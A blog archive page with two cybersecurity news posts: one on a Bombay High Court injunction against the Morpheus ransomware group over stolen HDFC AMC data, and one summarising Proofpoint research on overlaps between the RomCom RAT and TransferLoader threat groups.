Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Morpheus ransomware. Show all posts
Morpheus ransomware
Bombay High Court cyber attack Data Breach HDFC Asset Management Company Morpheus ransomware

Bombay High Court Restrains ‘Morpheus’ Ransomware Group From Sharing HDFC AMC’s Stolen Data

 

The Bombay High Court has issued a temporary injunction against a ransomware group calling itself "Morpheus," preventing it from publishing, distributing, or revealing confidential information allegedly stolen from HDFC Asset Management Company (HDFC AMC).

The interim order was passed on May 29 by a vacation bench led by Justice Shreeram Shirsat, which observed that the company had established a prima facie case warranting immediate relief.

"If the confidential data is misused or leaked or traded or compromised, it will lead to dreadful consequences and it can cause irreparable and irreversible damage to the plaintiff company," the court said.

In addition to restraining the ransomware group from using or disclosing the data, the court directed the Union government to take appropriate measures to remove, block, disable, and delete online accounts associated with the stolen information.

The order came in response to a suit filed by HDFC Asset Management Company Limited seeking legal protection against the unidentified hackers. The company requested the court to prohibit the cybercriminals from sharing, publishing, or otherwise exploiting the confidential data allegedly taken during the cyberattack.

HDFC AMC also sought directions against the Department of Telecommunications and the Ministry of Electronics and Information Technology, urging them to take necessary action to eliminate online access points linked to the compromised data.

According to the petition, HDFC AMC provides investment management and advisory services to millions of HDFC Mutual Fund investors and oversees assets belonging to investors across the country. As part of its operations, the company maintains sensitive customer information, including names, addresses, identity records, PAN details, bank account information, and investment-related data.

The company informed the court that on May 16, its IT administrator detected unusual activity within its technology infrastructure. Further investigation led to the discovery of an email from an entity identifying itself as "Morpheus," which claimed to have extracted more than 680 GB of critical company data.

Following the incident, HDFC AMC said it immediately activated its cybersecurity response protocols to contain the breach and notified the Securities and Exchange Board of India (SEBI) about the incident.

The company argued that there remains a significant risk of the stolen information being leaked, which could expose millions of investors to identity theft, financial fraud, and other forms of cybercrime. It further contended that any public release of the data could severely impact its reputation and operations.

The matter is scheduled for further hearing before the Bombay High Court on June 16.

Read more »
UNK_GreenSec threat group
cybersecurity threat actors malware Morpheus ransomware RomCom RAT TA829 cyberattacks TransferLoader UNK_GreenSec threat group

RomCom RAT and TransferLoader Attacks Reveal Alarming Parallels in Cyber Espionage and Ransomware Tactics

 

Cybersecurity experts have uncovered strategic overlaps between two advanced threat groups: the operators of the RomCom RAT and another entity linked to a malware loader known as TransferLoader.

According to enterprise security firm Proofpoint, the TransferLoader activity is being tracked under the alias UNK_GreenSec, while RomCom RAT operations are attributed to the group TA829—also identified in cybersecurity circles as CIGAR, Storm-0978, Nebulous Mantis, and Void Rabisu, among other names.

Proofpoint's investigation into TA829 led to the discovery of UNK_GreenSec, with both groups displaying a high degree of similarity in infrastructure setup, email lure themes, delivery methods, and landing pages. “An unusual amount of similar infrastructure, delivery tactics, landing pages, and email lure themes,” the company reported.

TA829 stands out in the cyber threat ecosystem for conducting both intelligence-gathering missions and financially driven cyberattacks. Believed to be aligned with Russian interests, the group has exploited zero-day vulnerabilities in Mozilla Firefox and Microsoft Windows to spread RomCom RAT to global victims.

Earlier this year, PRODAFT revealed that the threat actors behind RomCom RAT used stealthy techniques such as bulletproof hosting, encrypted C2 communication, and living-off-the-land (LOTL) tactics to avoid detection.

TransferLoader, meanwhile, was first analyzed by Zscaler’s ThreatLabz following a February 2025 campaign in which it was deployed to distribute Morpheus ransomware to an unnamed American law firm.

Proofpoint also noted that both TA829 and UNK_GreenSec use REM Proxy services hosted on compromised MikroTik routers as part of their upstream communication channels. However, the method of compromising these routers remains unknown.

"REM Proxy devices are likely rented to users to relay traffic," said the Proofpoint threat research team. "In observed campaigns, both TA829 and UNK_GreenSec use the service to relay traffic to new accounts at freemail providers to then send to targets."

Further analysis suggests that both actors may rely on an automated email builder to rapidly generate sender accounts, as evidenced by similarly formatted addresses such as ximajazehox333@gmail.com and hannahsilva1978@ukr.net.

The phishing messages commonly carry a malicious link, embedded either directly in the email body or inside a PDF attachment. Victims clicking on these links are redirected through services like Rebrandly, ultimately landing on spoofed Google Drive or Microsoft OneDrive pages—carefully filtering out sandbox environments or uninteresting systems.

From here, the infection chain splits: victims redirected by UNK_GreenSec receive TransferLoader, while those targeted by TA829 are delivered a separate strain dubbed SlipScreen.

Both groups have reportedly used PuTTY’s PLINK utility to establish SSH tunnels and hosted payloads on IPFS (InterPlanetary File System) for further stages of their campaigns.

SlipScreen serves as a stealthy loader that decrypts and injects shellcode directly into system memory, but only proceeds if it detects at least 55 recently accessed documents in the Windows Registry—an apparent method to evade sandbox detection.

"We assess that 55 is an arbitrary number chosen by the actor," said Greg Lesnewich, senior threat researcher at Proofpoint. "Previous versions checked for 100 documents. It’s unclear why this threshold changed."

The loader then drops malware such as MeltingClaw (aka DAMASCENED PEACOCK) or RustyClaw, which can install backdoors like ShadyHammock or DustyHammock. ShadyHammock is often used to deploy SingleCamper (also known as SnipBot), an evolved version of RomCom RAT. DustyHammock, in addition to system reconnaissance, can retrieve payloads from IPFS-based storage.

TransferLoader-linked campaigns have been seen using job application-themed lures, tricking victims into clicking on a fake resume link that initiates the download of TransferLoader from an IPFS-hosted webshare.

Designed for stealth, TransferLoader enables the silent deployment of additional malicious tools including Metasploit and Morpheus ransomware, a rebranded variant of HellCat ransomware.
Read more »
Subscribe to: Posts (Atom)